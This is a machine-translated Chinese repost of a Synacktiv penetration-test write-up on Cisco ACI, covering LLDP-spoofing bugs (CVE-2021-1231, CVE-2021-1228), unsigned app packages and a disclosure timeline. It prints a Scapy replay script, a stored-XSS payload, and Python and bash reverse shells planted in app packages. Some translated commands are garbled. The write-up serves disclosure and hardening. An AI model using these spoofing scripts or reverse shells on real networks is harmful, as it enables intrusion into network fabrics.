渗透测试CISCO ACI

admin 2022年10月5日23:06:07评论56 views字数 12787阅读42分37秒阅读模式

Synacktiv有机会在几周内对基于Cisco ACI解决方案的SD-LAN项目执行安全评估。下面的文章简要介绍了Cisco ACI的自动发现和初始化的一些内部机制,以及在安全评估过程中发现的弱点,包括CVE-2021-1228和CVE-2021-1231。


每个测试都在以下版本上执行:

  • Nexus 9000交换机上的14.2(4i)

  • APIC控制器上的4.2(4i)


ACI?

首先,ACI代表以应用程序为中心的基础架构。这是思科的SDN(软件定义网络)解决方案。在收购Insieme之后,此解决方案便从Cisco诞生。它是一个策略驱动的解决方案,集成了软件和硬件。这是一种为IT创建通用的,基于策略的通用框架的简便方法,尤其是跨不同的应用程序,网络和安全域。基于策略或策略驱动的策略由一组确定操作过程的准则或规则组成。


硬件由叶式主干配置中的Cisco Nexus 9000系列交换机和应用程序策略基础架构控制器(APIC)组成。这套设备被Cisco称为Fabric。APIC在ACI结构中的每个交换机上管理和推送策略。没有配置绑定到设备。APIC充当所有策略的中央存储库,并能够根据需要部署,停用和重新部署交换机。


简而言之,ACI将网络管理员用来在X组件(交换机,路由器等)上复制的所有配置集中在一个地方。


ACI结构的拓扑如下所示:

渗透测试CISCO ACI

ACI包含以下构建基块:

  • 思科应用策略基础架构控制器(APIC)

    • 连接到1或2

  • 为Cisco ACI配置的Cisco Nexus 9000交换机

    • 从未直接连接到另一个Leaf

    • 连接到每个spine

    • 连接到终端设备和入站LAN

    • 绝对不要直接连接到其他Spine(否则LLDP和MCP将关闭)

    • 连接到每个Leaf

    • 在spine模式下

    • 连接到终端设备和入站LAN

可以选择将其他一些构造块添加到结构中,例如ACI Multi-Site Orchestrator或Cloud APIC。


APIC

基础架构控制器是Cisco ACI解决方案的主要架构组件。它是Cisco ACI Fabric,策略实施和运行状况监视的自动化和管理的统一点。APIC设备是集中式集群控制器,可优化性能并统一物理和虚拟环境的操作。该控制器管理和操作可扩展的多租户Cisco ACI Fabric。


APIC的主要功能包括:

  • 以应用程序为中心的网络策略

  • 基于数据模型的声明式供应

  • 应用程序和拓扑监视和故障排除

  • 第三方整合

  • 第4层到第7层(L4-L7)服务

  • VMware vCenter和vShield

  • Microsoft Hyper-V,System Center虚拟机管理器(SCVMM)和Azure Pack

  • 开放式虚拟交换机(OVS)和OpenStack

  • Kubernetes,RedHat OpenShift,Docker企业

  • 图像管理(Spine和Leaf)

  • 思科ACI清单和配置

  • 跨设备集群的分布式框架上的实现

  • 关键管理对象(租户,应用程序配置文件,交换机等)的运行状况得分

  • 故障,事件和性能管理

  • 思科应用虚拟边缘,可以用作虚拟Leaf交换机

控制器框架可与Cisco ACI实现广泛的生态系统和行业互操作性。它使Cisco ACI环境与来自众多供应商的管理,业务流程,虚拟化和L4-L7服务之间具有互操作性。


引擎盖下

在结构中发现

ACI的目标之一是简化部署和配置新网络设备的任务。当将新的交换机添加到光纤网时,除了从APIC管理界面授权新设备外,管理员不应执行任何操作。这是如何运作的?


首先,结构中的每个设备都使用LLDP协议发现彼此。缺省情况下,它们每30秒广播一次LLDP数据包。LLDP数据包由几个类型长度值(TLV)字段组成,其中包含各种信息,例如型号,序列号,固件版本,VLAN ID或节点内部IP。例如,Leaf发送的数据包如下所示:

渗透测试CISCO ACI

来自像Leaf一样的Nexus交换机的LLDP数据包

无论状态如何,这些LLDP数据包都会在每个交换机的每个接口上广播。这意味着直接连接到Leaf接口的设备将接收此信息,并被告知ACI设备的存在。当新的节点或控制器(以前从未被Fabric看到)连接到Leaf或Spine接口时。发生以下步骤:

  • 设备广播其LLDP数据包,其中包含其固件版本,序列号,TLV“ ACI节点角色”,以定义其在结构中的未来角色。值0表示设备是APIC,1是叶子,2是书脊。

  • 如果是Leaf或Spine,则APIC管理UI建议管理员将新设备添加到Fabric中。

  • 管理员将新设备添加到光纤网络后,该接口便立即切换到内部VLAN。(您将在本文后面看到,新的APIC不需要管理员批准即可与内部网络进行通信)

  • 交换机会将从新设备收到的每个DHCP请求中继到第一个APIC,并充当DHCP服务器。新设备将在DHCP报价中获得其新的主机名。

  • 新的APIC将通过第一个APIC槽HTTP检索最新的固件,设备软件包和应用程序

  • 新节点可能开始使用结构内消息传递协议(IFM)与结构进行通信。


只要节点可以通过IFM与APIC交换心跳,就认为该节点是活动的。

以下架构总结了APIC的发现过程。

渗透测试CISCO ACI

APIC发现流程(https://www.ciscolive.com/c/dam/r/ciscolive/emea/docs/2015/pdf/BRKACI-2333.pdf)

 

新的交换机或控制器可以轻松加入结构,而无需验证其序列号或证书,因为默认情况下,结构安全模式设置为“允许”。与严格模式相反,它不会强制执行基于序列号的授权,并且如果交换机出示无效证书也不会停止操作。

渗透测试CISCO ACI

严格和宽松模式之间的差异

https://www.cisco.com/c/en/us/td/docs/switches/datacenter/aci/apic/sw/1-x/aci-fundamentals/b_ACI-Fundamentals/b_ACI -Fundamentals_chapter_010011.htm l)


由于这些原因,Synacktiv强烈建议管理员在发现每台交换机并将其包含在Fabric中后立即配置严格模式。


为此,可以在重新启动之前在APIC上发出以下命令:

apic1#config   apic1(config)#系统结构安全模式严格

一旦在结构中包含新的交换机或APIC,它将开始通过结构间消息传递(IFM)协议进行通信。


互通(IFM)

交换矩阵内部的每个配置和策略交换都使用交换矩阵间消息传递(IFM)协议。IFM始终封装在SSL隧道内。


例如,在新APIC的第一个配置中,在APIC通过LLDP广播其存在之后,Fabric中的第一个APIC将尝试与新APIC的端口12567(使用服务svc_ifc_appliancedirectorservice)建立SSL连接。客户端和服务器都将提供由Cisco CA签名的证书链(Cisco Root CA 2048 => Cisco Manufacturing CA => APIC-SERVER)。


这两个证书都预先安装在设备上,并且结构中的每个设备都不同,因为证书CommonName包含节点序列号。具有管理员访问Cisco APIC权限的攻击者无法轻松检索这些证书的私钥,他首先需要获得root特权升级。每个设备上都有大量的IFM端口正在侦听。例如,在我们的实验室APIC上,发现这些端口正在侦听:

$ netstat -letuna | grep 600 tcp 0 0 10.0.0.1:12471 0.0.0.0:* LISTEN 600 41721      tcp 0 0 10.0.0.1:12215 0.0.0.0:* LISTEN 600 37527      tcp 0 0 10.0.0.1:12119 0.0.0.0 :* LISTEN 600 25200      tcp 0 0 10.0.0.1:13079 0.0.0.0:* LISTEN 600 42861      tcp 0 0 10.0.0.1:13175 0.0.0.0:* LISTEN 600 16327      tcp 0 0 10.0.0.1:12343 0.0.0.0:* LISTEN 600 128041     tcp 0 0 10.0.0.1:12983 0.0.0.0:* LISTEN 600 128037    tcp 0 0 10.0.0.1:12727 0.0.0.0:* LISTEN 600 41559      tcp 0 0 10.0.0.1:12951 0.0.0.0:* LISTEN 600 125031     tcp 0 0 10.0.0.1:13143 0.0.0.0:* LISTEN 600 41555      tcp 0 0 10.0.0.1:12247 0.0.0.0:* LISTEN 600 45680 tcp 0 0 10.0.0.1:12375 0.0.0.0:* LISTEN 600906      tcp 0        0 10.0.0.1:12759 0.0.0.0:* LISTEN 600 40624      tcp 0 0 10.0 .0.1:13271 0.0.0.0:*监听600 40620     tcp 0 0 10.0.0.1:12311 0.0.0.0:* LISTEN 600 38700      tcp 0 0 10.0.0.1:12472 0.0.0.0:* LISTEN 600 41722      tcp 0 0 10.0.0.1:12216 0.0.0.0:* LISTEN 600 37528      tcp 0 0 10.0.0.1:12120 0.0.0.0:* LISTEN 600 25201      tcp 0 0 10.0.0.1:13080 0.0.0.0:* LISTEN 600 42862      tcp 0 0 10.0.0.1:13176 0.0.0.0:* LISTEN 600 16328      tcp 0 0 10.0 .0.1:12344 0.0.0.0:* LISTEN 600 128042    tcp 0 0 10.0.0.1:12984 0.0.0.0:* LISTEN 600 128038     tcp 0 0 10.0.0.1:12728 0.0.0.0:* LISTEN 600 41560      tcp 0 0 10.0.0.1:12952 0.0.0.0:* LISTEN 600125032     tcp 0 0 10.0.0.1:13144 0.0.0.0:* LISTEN 600 41556 tcp 0 0 10.0.0.1:12248 0.0.0.0:* LISTEN 600 45681      tcp 0 0 10.0.0.1:12376 0.0.0.0:* LISTEN        600907      tcp 0 0 10.0 .0.1:12760 0.0.0.0:* LISTEN 600 40625     tcp 0 0 10.0.0.1:13272 0.0.0.0:* LISTEN 600 40621      tcp 0 0 10.0.0.1:12312 0.0.0.0:* LISTEN 600 38701

它们中的每一个都需要来自客户端的有效链证书来建立通信。


问题所在

思科ACI解决方案已经过测试,并且ERNW的两名研究人员完成了出色的工作:Oliver Matula博士和Frank Block博士。

至少在白皮书中发现了6个CVE :

  • CVE-2019-1836-符号链接路径遍历漏洞;

  • CVE-2019-1803-根特权升级;

  • CVE-2019-1804-默认SSH密钥 以上CVE中的这3个的组合导致通过本地SSH服务器在IPv6上的叶交换机上进行远程代码执行。

  • CVE-2019-1890-架构基础结构VLAN未经授权的访问漏洞,或简单的LLDP欺骗如何翻转Leaf的端口,以便将其视为Fabric的内部端口;

  • CVE-2019-1901-链路层发现协议缓冲区溢出漏洞

  • CVE-2019-1889-REST API特权升级漏洞

  • 虽然这些CVE应该已经在14.1(1i)版本中修复,但Synacktiv注意到14.2(4i)版本中仍然存在Fabric Infrastructure VLAN未经授权的访问漏洞(CVE-2019-1890),但存在一些差异。同时,还发现了一个新的“拒绝服务”漏洞。

白皮书链接:

https://static.ernw.de/whitepaper/ERNW_Whitepaper68_Vulnerability_Assessment_Cisco_ACI_signed.pdf


端口拒绝服务和CVE-2019-1890

Leaf应与其SFP接口上的APIC控制器进行交互,并与其QSFP接口上的其他交换机进行交互。与ACI Fabric通信的每个入站主机都将通过SFP接口传输其流量。


此外,Leaf交换机信任LLDP数据包的内容,此外,它还信任从未知设备发送的欺骗性LLDP数据包。只需监视网络大约一分钟并等待合法的LLDP数据包,即可轻松收集用于制作此数据包的强制性TLV。实际上,对于接收器和收发器,默认LLDP策略设置为ON。因此,Fabric的每个设备每30秒发送一次LLDP数据包。


如果设备与ACI Leaf的SFP接口具有直接链接,并发送TLV“ ACI节点角色”设置为1(Leaf)或2(trunk)且TLV“ ACI端口模式”设置为0的LLDP数据包,端口将设置为发现状态,并且将禁用切换。发生此现象的原因在于,交换机不希望在其SFP端口上收到来自交换机的LLDP数据包。

渗透测试CISCO ACI

受影响端口的Apic管理视图

该端口将在LLDP数据包的TTL值中定义的时间段内禁用。

例如,可以在Python脚本中使用Scapy库来发出数据包:

$ hexdump都lldp_packet 0000000 C3D4 A1B2技术0004 0000 0000 0000 0000 0000010 FFFF 0000 0001 0000 71b3 5ebd 80FB 0004 0000020 0159 0000 0159 0000 8001 00C2 0e00 27b8 0000030 b1eb F335 CC88 0702 B804 eb27 35B1 04f3 0000040 0708 7445 3168 322F 0631技术FE10 0006 0000050 4201 00d8 fe00 0005 4201 01ca 0000      000005e 
$ scapy.all import中的cat replay.py * file = sys.argv [1] iface = sys.argv [2] packet = rdpcap(file)sendp (packet,iface = iface)
$ sudo python replay.py lldp_packet eth0发送了1个数据包。
#网关不再响应,端口关闭。$平10.10.10.1PING 10.10.10.1(10.10.10.1)56(84)个字节的数据。从10.10.10.10起icmp_seq = 1从10.10.10.10起无法访问目标主机icmp_seq = 2从10.10.10.10起无法访问目标主机icmp_seq = 3无法访问目标主机

这意味着与Cisco ACI Fabric中的交换机的SFP接口直接链接的所有设备都可以完全禁用其连接的端口。因此,使用同一端口的其他设备也将受到影响。


此漏洞已报告给Cisco,已注册为CVE-2021-1231,并已在版本14.2(5l)中修复。(https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apic-lldap-dos-WerV9CFj)


但是,如果任意设备在SFP接口上将TLV“ ACI节点角色”设置为0(APIC)发送LLDP数据包,会发生什么情况?

结果差得多,并且已经在CVE-2019-1890中进行了报告。


攻击前Leaf交换机端口的状态为:

LEAF_2# show interface Eth1/5 switchportName: Ethernet1/5Switchport: EnabledSwitchport Monitor: not-a-span-destOperational Mode: trunkAccess Mode Vlan: 14 (default)Trunking Native Mode VLAN: 14 (default)Trunking VLANs Allowed: 13-14

并且据推测,Infra VLAN仅包含一个端口(Eth1 / 1):

LEAF_2# show vlan id 20 extendedVLAN Name                             Encap            Ports                    ---- -------------------------------- ---------------- ------------------------ 20   infra:default                    vxlan-16777209,  Eth1/1                                                vlan-4

渗透测试CISCO ACI

LLDP欺骗之前的状态

在连接到Eth1 / 5的设备上,我们使用与CVE-2019-1890(在此处找到)相同的漏洞利用,减去除TLV“ ACI节点角色”设置为0(APIC)和ACI红外VLAN设置为4以外的每个参数:

$ sudo ./lldp_spoof.py eth0 4[*] Packet LLDP sent!

攻击后的Leaf端口切换到基础模式和内部VLAN:

LEAF_2# show interface Eth1/5 switchportName: Ethernet1/5  Switchport: Enabled  Switchport Monitor: not-a-span-dest  Operational Mode: trunk  Access Mode Vlan: unknown (default)  Trunking Native Mode VLAN: unknown (default)  Trunking VLANs Allowed: 20

LEAF_2# show vlan id 20 extendedVLAN Name Encap Ports ---- -------------------------------- ---------------- ------------------------ 20 infra:default vxlan-16777209, Eth1/1, Eth1/5 vlan-4

渗透测试CISCO ACI

LLDP欺骗后的状态

配置正确的802.1Q标签后,未知设备即可访问Fabric内部VLAN:

$ sudo ip link add link eth0 name eth0.4 type vlan id 4$ sudo ifconfig eth0.4 10.0.0.4/8 up $ sudo ip r a default dev eth0.4$ ping LEAFPING 10.0.104.64 (10.0.104.64) 56(84) bytes of data.64 bytes from 10.0.104.64: icmp_seq=1 ttl=64 time=1.30 ms

似乎CVE-2019-1890没有得到正确修复,或者在思科发布的第一个补丁中没有正确识别此漏洞的根本原因。


此漏洞已报告给Cisco,已注册为CVE-2021-1228,并已在版本14.2(5l)中修复。(https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-n9kaci-unauth-access-5PWzDx2w)


攻击者使任意设备加入内部VLAN后该怎么办?

首先,除了要连接的Leaf之外,他将无法到达Fabric内部的任何设备。由于ACI不会将我们的设备视为结构的一部分,因此尚未在任何其他交换机上配置路由。


从那里,他可以使用UDP VXLAN数据包与Leaf上暴露的隧道端点(TEP)进行交互,以将任何数据包发送到连接到光纤网的任何外部设备。ERNW白皮书中已经描述了这种攻击。但是,必须强制使用8位数字(VXLAN网络标识符),并且通信将仅是单向的,因为另一端不存在任何路由。


此外,还公开了在Leaf上运行的几个服务。但是,它们每个都需要使用由Cisco CA签名的证书或有效的管理员凭据进行身份验证。

$ nmap -sV -p- 10.0.104.64Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:15 CESTNmap scan report for 10.0.104.64Host is up (0.00020s latency).Not shown: 65513 closed portsPORT  STATE SERVICE22/tcp    open  ssh                 syn-ack OpenSSH 7.8 (protocol 2.0)443/tcp   open  ssl/https           syn-ack Cisco APIC7777/tcp  open  cbt?                syn-ack8000/tcp  open  http-alt?           syn-ack8002/tcp  open  ssl/teradataordbms? syn-ack8009/tcp  open  ssl/ajp13?          syn-ack12119/tcp open  ssl/unknown         syn-ack12120/tcp open  ssl/unknown         syn-ack12151/tcp open  ssl/unknown         syn-ack12152/tcp open  ssl/unknown         syn-ack12183/tcp open  ssl/unknown         syn-ack12184/tcp open  ssl/unknown         syn-ack12407/tcp open  ssl/unknown         syn-ack12408/tcp open  ssl/unknown         syn-ack12439/tcp open  ssl/unknown         syn-ack12440/tcp open  ssl/unknown         syn-ack12887/tcp open  ssl/unknown         syn-ack12888/tcp open  ssl/unknown         syn-ack12919/tcp open  ssl/unknown         syn-ack12920/tcp open  ssl/unknown         syn-ack13015/tcp open  ssl/unknown         syn-ack13016/tcp open  ssl/unknown         syn-ackNmap done: 1 IP address (1 host up) scanned in 22.68 seconds
  • 端口22是OpenSSH服务器,而端口443是对象存储。两者都需要管理员凭据。

  • 端口7777是托管Rest API的Nginx。它需要一个有效的管理员cookie。

  • 端口8000到8009需要Cisco CA签名的客户端证书。

  • 从12119到13016的较高端口用于结构间消息传递通信。

攻击不会立即使Fabric处于危险之中,但是会大大扩大潜在的攻击面。


由于这些原因,一旦发现Fabric中的每个设备,Synacktiv建议要么升级到版本14.2(5l),要么在Leaf Access Port策略中将每个Leaf的LLDP策略设置为“关闭”。这样,每个交换机将停止向每个接口广播LLDP数据包,并且来自未知设备的LLDP数据包将被简单地忽略。


与思科协调的披露时间表:

  • 6月30日:思科已获悉2个LLDP漏洞。

  • 9月15日:思科确认了此漏洞,并发布了解决这些问题的版本14.2(5l)。

  • 12月3日:分配了CVE-2021-1228和CVE-2021-1231。

  • 2月24日:思科发布了他们的公告。


进一步研究:没有针对荒野的签名

白皮书中描述的CVE-2019-1889已由Cisco在先前的软件版本中正确修补。目录遍历实际上是不可利用的,但是签名问题仍然很重要。


可以在APIC上安装应用程序或服务引擎(第4-7层设备)。两种功能都可以通过APIC Web界面安装,并且本质上都是包含XML,HTML,Python等的ZIP文件…


可以在https://dcappcenter.cisco.com/上找到合法的应用程序。


例如,可以下载Policy Viewer应用程序(https://dcappcenter.cisco.com/policy-viewer.html)并在app.html文件中添加存储的XSS:

$ cat Cisco_PolicyViewer/UIAssets/app.html<!doctype html><html lang="en"><head><meta charset="utf-8"/><meta name="viewport"content="width=device-width,initial-scale=1,shrink-to-fit=no"/><title>ACI PolicyViewer</title><link href="./static/css/main.e020ecc4.chunk.css"rel="stylesheet"></head><body class="cui" style="height:100%;overflow-y:hidden">[...]</script><script>alert(document.domain);</script>

部署结果应用程序不会触发任何错误:

渗透测试CISCO ACI

应用已成功安装

然后,操作员一旦访问应用程序UI,<script>alert(document.domain);</script>便会执行以下代码:

渗透测试CISCO ACI

弹出警报窗口,表示已触发XSS。

可以使用设备包装进行相同类型的测试。例如,使用asa-device-pkg-1.3.12.3.zip软件包。我们将以下反向外壳存储在Python代码中:

import socket,subprocess,osimport ptys=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("10.0.0.1",12345))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)pty.spawn("/bin/sh")

同样,在部署程序包时没有看到错误。部署后,将触发插入的代码,我们将获得一个反向外壳,但是……用户没有人:

admin@apic1:~> socat - TCP-LISTEN:12345lsbin dev etc install lib lib64 logs pipe sbin tmp usr venviduid=99(nobody) gid=99(nobody) groups=99(nobody)

此外,其中一些部署了Docker容器。例如应用程序InfobloxSync:https : //dcappcenter.cisco.com/infobloxsync.html

如果我们检查应用程序的内容:

$ ls */*Cisco_InfobloxSync/app.json
Cisco_InfobloxSync/Image:aci_appcenter_docker_image_v2.tgz
Cisco_InfobloxSync/Media:License Readme
Cisco_InfobloxSync/Service:app.py Infoblox_DB_sync_14.py InfobloxTools.pyc schema.py settings.py start.sh validateConnection02.pycInfoblox_DB_sync_14 InfobloxTools.py my_db.sqlite schema.pyc settings.pyc validateConnection02.py
Cisco_InfobloxSync/UIAssets:app.html app-start.html asset-manifest.json favicon.ico images InfobloxLogo.png service-worker.js static

有一个aci_appcenter_docker_image_v2.tgz文件,其中包含:

$ ls *
b87debb6eaf180f989ed24b2dcfe9ef71bf7007d3853cf96c85477b4da7fe701.json manifest.json repositories

051e281057ec3ce691d8ac90d4194b8c2530ec1867b674d3e3a303affc7f7dc5:
json layer.tar VERSION

38e1eee9f579b0781680a92492906eb1b45455dcee38c4cf8439c2702d60f35a:
json layer.tar VERSION

3f978a74fbe136262600e4b78bdd1629c86a858166827cfd1fa9e90143ba8876:
json layer.tar VERSION

701f643eefd90a50e8dcade7405e7459b146c4be8a4d0d74c991f5d7a4dda56d:
json layer.tar VERSION

9d4e5244486b622df965c76c5e83a71e0a462c125ceb0683c2c712445d305b89:
json layer.tar VERSION

a40333597e2a57a840bc755ca08d5a51ac0ed76337dc346d4cefa1a5e1dd5eac:
json layer.tar VERSION

起初,我们认为这是有希望的。我们使用以下行修改了应用程序的启动脚本:

/bin/bash -i >& /dev/tcp/172.17.0.1/12345 0>&

然后,一旦启用该应用程序,我们就获得一个shell作为root ...,但是在一个隔离良好的容器中:

admin@apic1:~> socat - TCP-LISTEN:12345bash: no job control in this shell
root@bd95ab2db8c1:/# id && uname -auid=0(root) gid=0(root) groups=0(root)Linux bd95ab2db8c1 4.14.164atom-2 #1 SMP Tue Feb 11 05:07:18 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

我们仍然认为,可以通过这种方式完成一些有趣的事情,并且安装外部软件包可能会成为攻击者进入Cisco Fabric的切入点。


因此,Synacktiv建议仅下载和部署在Cisco官方商店中找到的应用程序,网址为:https ://dcappcenter.cisco.com/。


结论

Cisco ACI是一个构建良好且安全的SDN解决方案。但是通常,一个复杂的系统会带来多个弱点。有时,漏洞修补程序无法涵盖整个漏洞。


为了加强ACI安全性,Synacktiv建议Cisco ACI管理员执行以下操作:

  • 为结构发现配置严格模式

  • 在Leaf访问端口策略中将每个叶子的LLDP策略设置为“关闭”

  • 将Nexus 9k至少升级到版本14.2(5l)

  • 仅下载和部署在官方Cisco应用商店中找到的应用


参考

https://www.sdxcentral.com/data-center/definitions/what-is-cisco-aci/


https://i.blackhat.com/USA-19/Wednesday/us-19-Matula-APICs-Adventures-In-Wonderland.pdf


https://static.ernw.de/whitepaper/ERNW_Whitepaper68_Vulnerability_Assessment_Cisco_ACI_signed.pdf


作者:Adrien Peter

翻译自:https://www.synacktiv.com/en/publications/pentesting-cisco-aci-lldp-mishandling.html

渗透测试CISCO ACI

原文始发于微信公众号(Ots安全):渗透测试CISCO ACI

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月5日23:06:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试CISCO ACIhttp://cn-sec.com/archives/1106123.html

发表评论

匿名网友 填写信息